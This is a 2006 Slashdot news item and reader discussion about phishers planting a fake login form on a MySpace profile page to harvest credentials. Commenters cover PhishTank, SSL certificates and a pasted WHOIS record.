MySpace Accounts Compromised By Phishers

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.

Maybe I caused the slow discovery

[AVryhof]

Maybe it's been my fault it's taken so long to "discover"

I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.

Re:Maybe I caused the slow discovery

Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.

Re:Maybe I caused the slow discovery

[Packt]

"Dear diary... mood? Apathetic."

Finally

[1310nm]

Keep up the good work, phishers!

The secrets of apathetic teens will soon be aired for the world to view!

Re:People won't change!

[drpimp]

No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!

You can view the horrible phishing status for free

OpenDNS people started http://phishtank.com/ service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps to people using that free list.

NOT on Myspace's MAIN PAGE

[kihjin]

FTA:

The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.

Re:NOT on Myspace's MAIN PAGE

[Extide]

Maybe you didnt notice the URL the spoof is at http://www.myspace.com/login_home_index_html

Re:Not quite.

[Fred_A]

Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.

So it's TheirSpace now ?

Re:Phishing + SSL

[baadger]

How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 In cases like these, i guess it makes sense

When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

Besides, Verisign only guarantee that their private signing keys are secure and therefore noone could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rats arse about what data retention or security is like on the other end. In fact refusing to issue MySpace a SSL certificate on the grounds their server side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.

So ... why is this a bad thing?

[Ravear]

Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

War is fun when you hate both sides.

Re:Phishing + SSL

[LO0G]

I'm confused. Here's the domain registration for wamucards.com:
Registrant:
        Washington Mutual, Inc. (DOM-1398425)
        1201 3rd Ave Seattle WA 98101 US

        Domain Name: wamucards.com

        Registrar Name: Markmonitor.com
        Registrar Whois: whois.markmonitor.com
        Registrar Homepage: http://www.markmonitor.com/

        Administrative Contact:
        Administrative Contact (NIC-14324742) iFolio, Inc.
        1201 3rd Ave, 40th Floor Seattle WA 98101 US
        domains@ifolioinc.com +1.2063596677 Fax- -
        Technical Contact, Zone Contact:
        Technical Contact (NIC-14324922) iFolio, Inc.
        1201 3rd Ave, 40th Floor Seattle WA 98101 US
        domains@ifolioinc.com +1.2063596677 Fax- -

        Created on..............: 2005-Aug-01.
        Expires on..............: 2007-Aug-01.
        Record last updated on..: 2006-May-17 11:10:55.

        Domain servers in listed order:

        MIA01.DIGEX.COM
        MIA02.DIGEX.COM

Why do you believe it's a phishing site or otherwise fraudulent?